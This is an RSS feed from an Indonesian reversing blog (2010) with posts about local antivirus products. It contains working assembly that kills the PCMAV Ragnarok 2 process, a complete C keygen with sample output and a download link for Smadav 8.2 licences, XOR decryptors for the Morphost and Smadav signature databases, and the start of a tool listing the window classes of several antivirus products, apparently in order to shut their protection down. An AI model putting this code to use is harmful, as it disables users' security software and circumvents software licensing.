<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NitrouZ Daily Blog - Another Resurrected Blog &#187; Blogging</title>
	<atom:link href="http://xtremenitro.org/category/blogging/feed" rel="self" type="application/rss+xml" />
	<link>http://xtremenitro.org</link>
	<description></description>
	<lastBuildDate>Mon, 21 Jun 2010 01:16:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Berkenalan Dengan PCMAV Ragnarok 2</title>
		<link>http://xtremenitro.org/2010/06/20/berkenalan-dengan-pcmav-ragnarok-2.html</link>
		<comments>http://xtremenitro.org/2010/06/20/berkenalan-dengan-pcmav-ragnarok-2.html#comments</comments>
		<pubDate>Sun, 20 Jun 2010 05:11:31 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Junk]]></category>
		<category><![CDATA[Reversing]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[pcmav]]></category>
		<category><![CDATA[preview]]></category>
		<category><![CDATA[ragnarok]]></category>
		<category><![CDATA[technical]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1756</guid>
		<description><![CDATA[Jadi tadi pagi saya sempat lihat-lihat PCMAV Ragnarok 2 yang masih dalam tahap Technical Prikitiew . Tampilannya kurang lebih seperti gambar di bawah ini: Bisa terlihat jelas bahwa captionnya menggunakan string yang acakadut. No problem, we&#8217;re not invalid. Kita lewati saja captionnya dan langsung menuju ke window classnya. Sebagai PoC (Proof of Concept) berikut ini [...]]]></description>
			<content:encoded><![CDATA[<p>Jadi tadi pagi saya sempat lihat-lihat PCMAV Ragnarok 2 yang masih dalam tahap <b>Technical Prikitiew</b> <img src='http://xtremenitro.org/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> . Tampilannya kurang lebih seperti gambar di bawah ini:</p>
<p><center><img src="http://xtremenitro.org/wp-content/uploads/2010/06/ss-ragnarok-450x316.png"></center></p>
<p>Bisa terlihat jelas bahwa captionnya menggunakan string yang acakadut. No problem, we&#8217;re not invalid. Kita lewati saja captionnya dan langsung menuju ke window classnya. Sebagai PoC (<i>Proof of Concept</i>) berikut ini source aplikasi kecil yang bisa digunakan untuk mematikan proses ragnarok 2 cukup dengan mencari classnya. Assemble dan link menggunakan fasm.</p>
<pre>
 format PE GUI 4.0
 include 'win32a.inc'

;// code //
 push   .done
 push   dword [fs:0]
 mov    dword [fs:0],esp
 invoke FindWindow,szcls,0
 test   eax,eax
 jz     .done
 invoke GetWindowThreadProcessId,eax,dwpid
 invoke OpenProcess,PROCESS_TERMINATE,0,[dwpid]
 test   eax,eax
 jz     .done
 push   eax
 invoke TerminateProcess,eax,0
 call   [CloseHandle]
.done:
 pop    dword [fs:0]
 add    esp,4
 invoke ExitProcess,0

;// data //
 szcls db 'TFClnMain',0
 dwpid dd 0
 hproc dd 0

;// imports //
data import
 library kernel32,'kernel32.dll',user32,'user32.dll'
 include 'api/kernel32.inc'
 include 'api/user32.inc'
end data
</pre>
<p>Sekian dan terima kasih&#8230; <img src='http://xtremenitro.org/smilies/yahoo_wink.gif' alt='&#59;&#41;' class='wp-smiley' width='18' height='18' title='&#59;&#41;' /></p>
<ul class="related_post"><li><a href="http://xtremenitro.org/2010/03/24/mengenal-lebih-jauh-pcmav-v3-0.html" title="Mengenal Lebih Jauh PCMAV v3.0">Mengenal Lebih Jauh PCMAV v3.0</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/06/20/berkenalan-dengan-pcmav-ragnarok-2.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Seputar Registrasi Smadav</title>
		<link>http://xtremenitro.org/2010/06/20/seputar-registrasi-smadav.html</link>
		<comments>http://xtremenitro.org/2010/06/20/seputar-registrasi-smadav.html#comments</comments>
		<pubDate>Sun, 20 Jun 2010 01:56:22 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Reversing]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[key]]></category>
		<category><![CDATA[keygen]]></category>
		<category><![CDATA[registrasi]]></category>
		<category><![CDATA[serial]]></category>
		<category><![CDATA[smadav]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1747</guid>
		<description><![CDATA[Disclaimer Artikel ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan artikel ini. *Use at your own risk*. Pendahuluan Anda mungkin sudah sering mendengar soal antivirus lokal bernama smadav. Kali ini kita akan membahas proteksi pada registrasi smadav, termasuk nantinya akan diberikan source code untuk membuat keygen smadav. Proteksi Key Bajakan [...]]]></description>
			<content:encoded><![CDATA[<p><b>Disclaimer</b><br />
Artikel ini hanya untuk tujuan pembelajaran semata. Penulis tidak bertanggungjawab atas penggunaan maupun penyalahgunaan artikel ini. *Use at your own risk*.</p>
<p><b>Pendahuluan</b><br />
Anda mungkin sudah sering mendengar soal antivirus lokal bernama smadav. Kali ini kita akan membahas proteksi pada registrasi smadav, termasuk nantinya akan diberikan source code untuk membuat keygen smadav.</p>
<p><b>Proteksi Key Bajakan</b><br />
Jika Anda memasukkan key bajakan pada smadav, maka otomatis smadav akan melakukan beberapa hal untuk menandai komputer Anda sebagai pengguna smadav bajakan. Berikut ini adalah cara yang ditempuh oleh smadav untuk membuat komputer Anda terdeteksi sebagai pembajak:</p>
<ul>
<li>Mengcopy file ke sistem dengan nama <b>PIRAsys.dll</b> (huruf A nya adalah karakter delta khas smadav)</li>
<li>Menambahkan value <b>lfPitchAndFamily</b> (lagi-lagi menggunakan karakter delta) ke registry pada subkey <b>HKCU\Software\Microsoft\Notepad</b></li>
<li>Menambahkan baris berisi <b># 241.241.241.241  antipiracyworld.com</b> pada file <b>%WINDIR%\system32\drivers\etc\hosts</b></li>
</ul>
<p>Jadi jika Anda selalu gagal memasukkan key, maka coba Anda hapus file, registry entry dan entry pada file hosts sesuai dengan petunjuk di atas.</p>
<p><b>Membuat Keygen</b><br />
Proses pembuatan key pada smadav sebenarnya tidak terlalu rumit. Yang perlu diperhatikan adalah smadav menggunakan nilai magic <img src='http://xtremenitro.org/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> . Selain itu, smadav hanya mengambil karakter alphanumeric pada nama. Jadi untuk satu key, kita bisa menggunakan banyak kombinasi nama, misalnya &quot;TKP Crew&quot;, &quot;TKP|Crew&quot;, &quot;TKP-Crew&quot; semuanya menggunakan 1 key saja. Ok, untuk mempersingkat waktu, berikut ini source code keygen smadav (untuk perusahaan):</p>
<pre>
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

int
main()
{
  int i, j, len;
  char szname[50];
  unsigned int a[6] = {0, 0, 0, 99, 99, 00};
  const unsigned int magic[] = {
  0x26,0x38,0x39,0x39,
  0x63,0x0F,0x3A,0x0C,
  0x0D,0x11,0x13,0x12,
  0x58,0x3A,0x34,0x34,
  0x0C,0x0D,0x0C,0x39,
  0x34,0x62
  };

  printf(
  "-----------------------------\n"
  "Smadav 8.2 Keygen by TKP Crew\n"
  "-----------------------------\n"
  "Nama (tanpa tanda baca): ");
  fgets(szname, sizeof(szname)-1, stdin);
  strupr(szname);
  len = strlen(szname)-1;
  for (i = 0, j = 0; i &lt; len; i++, j++)
  {
    if (j &gt; 2) j = 0;
    a[j] += (szname[i] * len) % 0x64;
    if (a[j] &gt; 0x64) a[j] %= 0x64;
  }
  for (i = 0; i &lt; 5; i++) { a[5] = (a[5] + (a[i] * len)) % 0x16; }
  a[5] = magic[(int) a[5]];
  printf("Serial : %02lu%02lu%02lu%02lu%02lu%02lu\n",a[3],a[5],a[4],a[0],a[1],a[2]);
  return 0;
}
</pre>
<p>contoh keygen ketika dijalankan</p>
<pre>
C:\&gt;key
-----------------------------
Smadav 8.2 Keygen by TKP Crew
-----------------------------
Nama (tanpa tanda baca): tkpcrew
Serial : 999999669943

C:\&gt;
</pre>
<p>hasilnya adalah sebagai berikut</p>
<p><center><img src="http://xtremenitro.org/wp-content/uploads/2010/06/ss-smadav-tkp.png"></center><br />
Bagi yang mau download keygen yang sudah jadi, <a href="http://jump.fm/EWMGF">silakan ke sini</a></p>
<p><b>Penutup</b><br />
Demikianlah artikel kali ini, semoga bermanfaat. Terima kasih kepada: Tuhan Yang Maha Esa, TKP Crew, SBKJ, INRev, dan Anda yang sudah membaca artikel ini <img src='http://xtremenitro.org/smilies/yahoo_wink.gif' alt='&#59;&#41;' class='wp-smiley' width='18' height='18' title='&#59;&#41;' /></p>
<ul class="related_post"><li><a href="http://xtremenitro.org/2010/03/06/smadav-2010-rev-8-1-key.html" title="Smadav 2010 Rev 8.1 Key">Smadav 2010 Rev 8.1 Key</a></li><li><a href="http://xtremenitro.org/2010/06/04/decrypting-smadav-loov-database.html" title="Decrypting Smadav Loov Database">Decrypting Smadav Loov Database</a></li><li><a href="http://xtremenitro.org/2010/06/06/decrypting-morphost-antivirus-database.html" title="Decrypting Morphost Antivirus Database">Decrypting Morphost Antivirus Database</a></li><li><a href="http://xtremenitro.org/2010/06/02/iseng-test-antivirus-lokal.html" title="[Iseng] Test Antivirus Lokal">[Iseng] Test Antivirus Lokal</a></li><li><a href="http://xtremenitro.org/2010/03/24/mengenal-lebih-jauh-pcmav-v3-0.html" title="Mengenal Lebih Jauh PCMAV v3.0">Mengenal Lebih Jauh PCMAV v3.0</a></li><li><a href="http://xtremenitro.org/2009/01/18/maleoav-unofficial-review.html" title="MaleoAV Unofficial Review">MaleoAV Unofficial Review</a></li><li><a href="http://xtremenitro.org/2008/12/09/apa-perlu-os-linux-ada-antivirus.html" title="Apa perlu OS Linux ada AntiVirus ?">Apa perlu OS Linux ada AntiVirus ?</a></li><li><a href="http://xtremenitro.org/2008/12/04/ansav-for-linux-bsd-32-bit-beta.html" title="Ansav for Linux &#038; BSD 32-bit (beta)">Ansav for Linux &#038; BSD 32-bit (beta)</a></li><li><a href="http://xtremenitro.org/2008/11/24/reversing-di-gnu-linux.html" title="Reversing di GNU/Linux">Reversing di GNU/Linux</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/06/20/seputar-registrasi-smadav.html/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Decrypting Morphost Antivirus Database</title>
		<link>http://xtremenitro.org/2010/06/06/decrypting-morphost-antivirus-database.html</link>
		<comments>http://xtremenitro.org/2010/06/06/decrypting-morphost-antivirus-database.html#comments</comments>
		<pubDate>Sun, 06 Jun 2010 12:48:09 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Reversing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[decrypt]]></category>
		<category><![CDATA[morphost]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1714</guid>
		<description><![CDATA[Pendahuluan Morphost adalah salah satu antivirus lokal yang cukup ternama dan situs resminya ada di sini. Untuk tutorial kali ini, saya menggunakan database morphost bulan Mei 2010 yang bisa diunduh di sini. Kita akan melakukan dekripsi untuk mengetahui format database morphost. Langkah-langkah Untuk mengetahui cara kerja morphost, kita terlebih dahulu melakukan sedikit debugging. Ok, jalankan [...]]]></description>
			<content:encoded><![CDATA[<p><b>Pendahuluan</b><br/><br />
Morphost adalah salah satu antivirus lokal yang cukup ternama dan situs resminya <a href="http://anonym.to/http://morphians.wordpress.com/">ada di sini</a>. Untuk tutorial kali ini, saya menggunakan database morphost bulan Mei 2010 yang bisa <a href="http://anonym.to/http://www.4shared.com/file/DGf_BNWY/DatabaseMorphostMei2010.html">diunduh di sini</a>. Kita akan melakukan dekripsi untuk mengetahui format database morphost.<br/><br />
<b>Langkah-langkah</b><br/><br />
Untuk mengetahui cara kerja morphost, kita terlebih dahulu melakukan sedikit debugging. Ok, jalankan Ollydbg lalu load morphost (pada artikel ini saya menggunakan morphost versi 7.1.0.0). Lihat bagian module yang diimport:</p>
<pre>
Executable modules
Base       Size       Entry      Name       File version    Path
00400000   001B5000   00401344   Morphost   7.01            H:\--snip--\Morphost ß.exe
73420000   00153000   73421AF8   MSVBVM60   6.00.9802       H:\WINDOWS\system32\MSVBVM60.DLL
77120000   0008B000   77121560   OLEAUT32   5.1.2600.5512   H:\WINDOWS\system32\OLEAUT32.dll
774E0000   0013D000   774FD0B9   ole32      5.1.2600.5512   H:\WINDOWS\system32\ole32.dll
77C10000   00058000   77C1F2A1   msvcrt     7.0.2600.5512   H:\WINDOWS\system32\msvcrt.dll
77DD0000   0009B000   77DD70FB   ADVAPI32   5.1.2600.5512   H:\WINDOWS\system32\ADVAPI32.dll
77E70000   00092000   77E7628F   RPCRT4     5.1.2600.5512   H:\WINDOWS\system32\RPCRT4.dll
77F10000   00049000   77F16587   GDI32      5.1.2600.5512   H:\WINDOWS\system32\GDI32.dll
77FE0000   00011000   77FE2126   Secur32    5.1.2600.5512   H:\WINDOWS\system32\Secur32.dll
7C800000   000F6000   7C80B63E   kernel32   5.1.2600.5512   H:\WINDOWS\system32\kernel32.dll
7C900000   000AF000   7C912C28   ntdll      5.1.2600.5512   H:\WINDOWS\system32\ntdll.dll
7E410000   00091000   7E41B217   USER32     5.1.2600.5512   H:\WINDOWS\system32\USER32.dll
</pre>
<p>Klik ganda pada baris <b>msvbvm60.dll</b> untuk menuju ke library tersebut. Setelah berada pada modul msvbvm60, tekan <b>Ctrl + N</b> lalu cari fungsi <i>__vbaFileOpen</i> seperti ini:</p>
<pre>
734F3B5D   .text      Export     __vbaFileOpen
</pre>
<p>Setelah ketemu, tekan <b>F2</b> untuk mengaktifkan <i>breakpoint</i>. Tekan <b>F9</b> untuk mulai menjalankan morphost. Kita akan menemukan breakpoint pertama, lanjutkan dengan menekan lagi <b>F9</b>. Pada breakpoint ke-2 ini akan terlihat bahwa morphost mengakses file <b>kernell.dat</b> pada direktori sistem (Windows\system32):</p>
<pre>
0012F9CC   00157384  UNICODE "H:\WINDOWS\system32\kernell.dat"
</pre>
<p>Nah, file tersebut adalah file database morphost yang sudah didekripsi oleh morphost ketika dijalankan. Sebenarnya, key yang digunakan oleh morphost bisa terlihat ketika proses debugging. Namun untuk menghemat waktu, keynya saya berikan saja <img src='http://xtremenitro.org/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> yaitu:</p>
<pre>
Database Morphost Antivirus
</pre>
<p><br/><br />
<b>Decryptor</b><br/><br />
Source code berikut ini bisa digunakan untuk mendekripsi database morphost (bulan Mei 2010).</p>
<pre>
#include &lt;windows.h&gt;

#ifdef _MSC_VER
#pragma comment(lib,"kernel32")
#pragma comment(lib,"user32")
#pragma comment(linker,"/entry:main /subsystem:windows")
#endif

void
main()
{
  int i;
  char *p;
  HANDLE hfile;
  HGLOBAL hmem;
  DWORD dwsize, dwtemp;
  static const char *szkey = "Database Morphost Antivirus";

  if ((hfile = CreateFile("database.mrp", GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0)) == INVALID_HANDLE_VALUE)
  {
    MessageBox (NULL, "gagal membuka file database morphost", "error", MB_OK | MB_ICONERROR);
    ExitProcess(1);
  }
  dwsize = GetFileSize(hfile, NULL);
  hmem = GlobalAlloc(GPTR, dwsize);
  p = (char *) GlobalLock(hmem);
  ReadFile(hfile, p, dwsize, &#038;dwtemp, NULL);
  CloseHandle(hfile);

  for (i = 0; i &lt; (int) dwsize; i++) { p[i] ^= szkey[(i % 27)]; }

  if ((hfile = CreateFile("database.txt", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)) != INVALID_HANDLE_VALUE)
  {
    WriteFile(hfile, hmem, dwsize, &#038;dwtemp, NULL);
    CloseHandle(hfile);
    MessageBox (NULL, "database morphost berhasil didekripsi", "info", MB_OK | MB_ICONINFORMATION);
  }
  GlobalUnlock(hmem);
  GlobalFree(hmem);
  ExitProcess(0);
}
</pre>
<p>Dan berikut ini adalah database morphost yang sudah didekripsi (bulan Mei 2010)</p>
<pre>
Database Mei 2010
Database Morphost Antivirus
by:Morphic Karta
Terima kasih kepada pengguna Morphost Antivirus yang telah mempercayakan Morphost sebagai guard komputer.
Kami masih tetap berusaha untuk memberikan yang terbaik, baik dari sisi kenyamanan penggunaan sampai keamanan komputer anda.
Kami juga mengharapkan agar masyarakat juga mau membantu kami dalam pengembangan database Morphost bulan Juni 2010. Kirim/upload sampel malware pada kami.
Anda bisa berikan link download malware kepada kami atau mengirimkannya secara langsung pada kami. Terima kasih.
10 Juni 2010
14
580
581
582
583
584
1003DC=DeleteRegedit=Maret 2009=Ringan
100630=Playboy-A=November 2009=Ringan
103218=Aidid=Tidak Ada Data=Sedang
10C968=OpenSystem=Tidak Ada Data=Sedang
1181AB=Decoil-Dropper=Tidak Ada Data=Parah
119723=FullHouse=Tidak Ada Data=Sedang
11DC95=Iwing=Tidak Ada Data=Sedang
...
</pre>
<p><b>Penutup</b><br/><br />
Demikianlah artikel singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan Yang Maha Esa, TKP crew, Kris Kaspersky, dan Anda yang telah membaca artikel ini <img src='http://xtremenitro.org/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /></p>
<ul class="related_post"><li><a href="http://xtremenitro.org/2010/06/04/decrypting-smadav-loov-database.html" title="Decrypting Smadav Loov Database">Decrypting Smadav Loov Database</a></li><li><a href="http://xtremenitro.org/2010/06/20/seputar-registrasi-smadav.html" title="Seputar Registrasi Smadav">Seputar Registrasi Smadav</a></li><li><a href="http://xtremenitro.org/2010/06/02/iseng-test-antivirus-lokal.html" title="[Iseng] Test Antivirus Lokal">[Iseng] Test Antivirus Lokal</a></li><li><a href="http://xtremenitro.org/2010/03/24/mengenal-lebih-jauh-pcmav-v3-0.html" title="Mengenal Lebih Jauh PCMAV v3.0">Mengenal Lebih Jauh PCMAV v3.0</a></li><li><a href="http://xtremenitro.org/2009/01/18/maleoav-unofficial-review.html" title="MaleoAV Unofficial Review">MaleoAV Unofficial Review</a></li><li><a href="http://xtremenitro.org/2008/12/09/apa-perlu-os-linux-ada-antivirus.html" title="Apa perlu OS Linux ada AntiVirus ?">Apa perlu OS Linux ada AntiVirus ?</a></li><li><a href="http://xtremenitro.org/2008/12/04/ansav-for-linux-bsd-32-bit-beta.html" title="Ansav for Linux &#038; BSD 32-bit (beta)">Ansav for Linux &#038; BSD 32-bit (beta)</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/06/06/decrypting-morphost-antivirus-database.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Decrypting Smadav Loov Database</title>
		<link>http://xtremenitro.org/2010/06/04/decrypting-smadav-loov-database.html</link>
		<comments>http://xtremenitro.org/2010/06/04/decrypting-smadav-loov-database.html#comments</comments>
		<pubDate>Fri, 04 Jun 2010 02:25:01 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Reversing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[decrypt]]></category>
		<category><![CDATA[loov]]></category>
		<category><![CDATA[smadav]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1708</guid>
		<description><![CDATA[Pendahuluan Pada artikel kali ini akan dibahas cara mendekripsi file database smadav yang menggunakan format loov. Mekanisme Dekripsi Jadi secara sederhana, file database smadav.loov bekerja seperti ini: cari ukuran file smadav.loov ubah format ukuran ke DWORD dan ambil lower byte dari ukuran tersebut. misalnya ukuran file databasenya 28119 bytes, maka jika diubah menjadi DWORD (hex) [...]]]></description>
			<content:encoded><![CDATA[<p><b>Pendahuluan</b><br/><br />
Pada artikel kali ini akan dibahas cara mendekripsi file database smadav yang menggunakan format <i>loov</i>.<br/><br />
<b>Mekanisme Dekripsi</b><br/><br />
Jadi secara sederhana, file database <i>smadav.loov</i> bekerja seperti ini:</p>
<ul>
<li>cari ukuran file <i>smadav.loov</i></li>
<li>ubah format ukuran ke DWORD dan ambil lower byte dari ukuran tersebut. misalnya ukuran file databasenya 28119 bytes, maka jika diubah menjadi DWORD (hex) menjadi 0x6DD7. nah, 0xD7 ini yang akan kita gunakan.</li>
<li>selanjutnya kita baca mulai dari offset 0&#215;20 dari file <i>smadav.loov</i> lalu setiap byte kita XOR dengan offset byte tersebut kemudian di XOR lagi dengan byte pada langkah sebelumnya (dalam hal ini 0xD7).
<li>ulangi sampai selesai</li>
</ul>
<p><span id="more-1708"></span><br />
<b>Proof of Concept</b><br/></p>
<pre>
        format PE GUI 4.0
	include 'win32a.inc'

;[code]------------------------------------------------------------------------

	push	.done
	push	dword[fs:0]
	mov	dword[fs:0],esp
	invoke	CreateFile,szloov,GENERIC_READ,0,0,OPEN_EXISTING,0,0
	cmp	eax,INVALID_HANDLE_VALUE
	je	.done
	mov	[hfile],eax
	invoke	GetFileSize,[hfile],0
	mov	[dwsize],eax
	invoke	GlobalAlloc,GPTR,eax
	mov	[hmem],eax
	invoke	ReadFile,[hfile],[hmem],[dwsize],dwtemp,0
	invoke	CloseHandle,[hfile]
	movzx	edx,byte[dwsize]
	mov	eax,20h
	mov	ebx,[hmem]
.blah:	mov	cl,byte[ebx+eax]
	xor	cl,al
	xor	cl,dl
	mov	byte[ebx+eax],cl
	inc	eax
	cmp	eax,dword[dwsize]
	jl	.blah
	invoke	CreateFile,szdump,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0
	cmp	eax,INVALID_HANDLE_VALUE
	je	.clean
	mov	[hfile],eax
	invoke	WriteFile,[hfile],[hmem],[dwsize],dwtemp,0
	invoke	CloseHandle,[hfile]
	invoke	MessageBox,0,szmsg,szcap,MB_OK+MB_ICONINFORMATION
.clean: invoke	GlobalFree,[hmem]
.done:	pop	dword[fs:0]
	add	esp,4
	invoke	ExitProcess,0

;[data]------------------------------------------------------------------------

szloov	db "smadav.loov",0
szdump	db "smadav.dump",0
szcap	db "info",0
szmsg	db "decrypt selesai, silakan cek file smadav.dump",0
hmem	dd 0
hfile	dd 0
dwsize	dd 0
dwtemp	dd 0

;[imports]---------------------------------------------------------------------

data import
library kernel32,'kernel32.dll',\
	user32,'user32.dll'
include 'api/kernel32.inc'
include 'api/user32.inc'
end data
</pre>
<p>dan berikut ini snippet hasil dekripsi file <i>smadav.loov</i> yang ada pada smadav 8.2 beta<br />
<center><img src="http://xtremenitro.org/wp-content/uploads/2010/06/ss-smadav.png"></center></p>
<p><b>Penutup</b><br/><br />
Sekian artikel kali ini, semoga bermanfaat. Terima kasih kepada: Tuhan Yang Maha Esa, TKP Crew, Kris Kaspersky, dan Anda yang telah membaca artikel ini <img src='http://xtremenitro.org/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /></p>
<ul class="related_post"><li><a href="http://xtremenitro.org/2010/06/06/decrypting-morphost-antivirus-database.html" title="Decrypting Morphost Antivirus Database">Decrypting Morphost Antivirus Database</a></li><li><a href="http://xtremenitro.org/2010/06/20/seputar-registrasi-smadav.html" title="Seputar Registrasi Smadav">Seputar Registrasi Smadav</a></li><li><a href="http://xtremenitro.org/2010/06/02/iseng-test-antivirus-lokal.html" title="[Iseng] Test Antivirus Lokal">[Iseng] Test Antivirus Lokal</a></li><li><a href="http://xtremenitro.org/2010/03/24/mengenal-lebih-jauh-pcmav-v3-0.html" title="Mengenal Lebih Jauh PCMAV v3.0">Mengenal Lebih Jauh PCMAV v3.0</a></li><li><a href="http://xtremenitro.org/2010/03/06/smadav-2010-rev-8-1-key.html" title="Smadav 2010 Rev 8.1 Key">Smadav 2010 Rev 8.1 Key</a></li><li><a href="http://xtremenitro.org/2009/01/18/maleoav-unofficial-review.html" title="MaleoAV Unofficial Review">MaleoAV Unofficial Review</a></li><li><a href="http://xtremenitro.org/2008/12/09/apa-perlu-os-linux-ada-antivirus.html" title="Apa perlu OS Linux ada AntiVirus ?">Apa perlu OS Linux ada AntiVirus ?</a></li><li><a href="http://xtremenitro.org/2008/12/04/ansav-for-linux-bsd-32-bit-beta.html" title="Ansav for Linux &#038; BSD 32-bit (beta)">Ansav for Linux &#038; BSD 32-bit (beta)</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/06/04/decrypting-smadav-loov-database.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Aplikasi Iseng</title>
		<link>http://xtremenitro.org/2010/06/02/aplikasi-iseng.html</link>
		<comments>http://xtremenitro.org/2010/06/02/aplikasi-iseng.html#comments</comments>
		<pubDate>Wed, 02 Jun 2010 10:29:36 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Junk]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[aplikasi]]></category>
		<category><![CDATA[iseng]]></category>
		<category><![CDATA[style]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1698</guid>
		<description><![CDATA[Aplikasi iseng yang sempat saya bikin beberapa tahun lalu. Hanya sempat ditest di Windows&#174; XP SP3 dan sepertinya ada beberapa fitur yang tidak akan berfungsi di Windows&#174; yang lebih baru dari XP. Berikut ini salah satu contoh fitur dari aplikasi ini: langsung saja, download di sini. [Iseng] Gara-gara Sebuah ModemIseng Dengan Broom]]></description>
			<content:encoded><![CDATA[<p>Aplikasi iseng yang sempat saya bikin beberapa tahun lalu. Hanya sempat ditest di Windows&reg; XP SP3 dan sepertinya ada beberapa fitur yang tidak akan berfungsi di Windows&reg; yang lebih baru dari XP.<br />
<span id="more-1698"></span><br />
Berikut ini salah satu contoh fitur dari aplikasi ini:</p>
<p><center><img src="http://xtremenitro.org/wp-content/uploads/2010/06/iseng.png" width="400" height="104"></center></p>
<p>langsung saja, <a href="http://anonym.to/http://www.mediafire.com/?koyzjz2zwoi">download di sini</a>.</p>
<ul class="related_post"><li><a href="http://xtremenitro.org/2009/02/07/iseng-gara-gara-sebuah-modem.html" title="[Iseng] Gara-gara Sebuah Modem">[Iseng] Gara-gara Sebuah Modem</a></li><li><a href="http://xtremenitro.org/2009/01/29/iseng-dengan-broom.html" title="Iseng Dengan Broom">Iseng Dengan Broom</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/06/02/aplikasi-iseng.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>[Iseng] Test Antivirus Lokal</title>
		<link>http://xtremenitro.org/2010/06/02/iseng-test-antivirus-lokal.html</link>
		<comments>http://xtremenitro.org/2010/06/02/iseng-test-antivirus-lokal.html#comments</comments>
		<pubDate>Wed, 02 Jun 2010 09:05:36 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Junk]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[lokal]]></category>
		<category><![CDATA[source]]></category>
		<category><![CDATA[test]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1692</guid>
		<description><![CDATA[GPL alias Ga Pake Lama, berikut ini source code sederhana yang dibuat dalam tempo yang sesingkat-singkatnya. /** * source code ini hanya untuk tujuan pembelajaran * TKP Crew tidak bertanggungjawab atas penggunaan * dan/atau penyalahgunaan source code ini. * USE AT YOUR OWN RISK. PERIOD */ #define WIN32_LEAN_AND_MEAN #include &#60;windows.h&#62; #include &#60;winsvc.h&#62; #ifdef _MSC_VER #pragma [...]]]></description>
			<content:encoded><![CDATA[<p>GPL alias Ga Pake Lama, berikut ini source code sederhana yang dibuat dalam tempo yang sesingkat-singkatnya.<br />
<span id="more-1692"></span></p>
<pre>
/**
 * source code ini hanya untuk tujuan pembelajaran
 * TKP Crew tidak bertanggungjawab atas penggunaan
 * dan/atau penyalahgunaan source code ini.
 * USE AT YOUR OWN RISK. PERIOD
 */

#define WIN32_LEAN_AND_MEAN
#include &lt;windows.h&gt;
#include &lt;winsvc.h&gt;

#ifdef _MSC_VER
#pragma comment(lib,"kernel32")
#pragma comment(lib,"advapi32")
#pragma comment(lib,"user32")
#pragma comment(lib,"msvcrt")
#pragma comment(linker,"/entry:main /subsystem:windows")
#endif

#define VB_MAIN "ThunderRT6Main"
#define VB_FORM "ThunderRT6FormDC"

struct {
  char *szcls;
  char *szcap;
} targets[] = {
  {VB_MAIN, "Morphost"},                    /* morphost */
  {VB_FORM, "autodetect"},                  /* morphost rtp */
  {VB_FORM, "Sys Tray Interface"},          /* smadav rtp */
  {"TFAdvMenu", "PCMAV Advanced Options"},  /* pcmav*/
  {"TFScanRD", "FScanRD"},                  /* pcmav rtp */
  {VB_FORM, "Configuration Settings"},      /* sven7 */
  {VB_FORM, "Ganti Warna"},                 /* FS-2 */
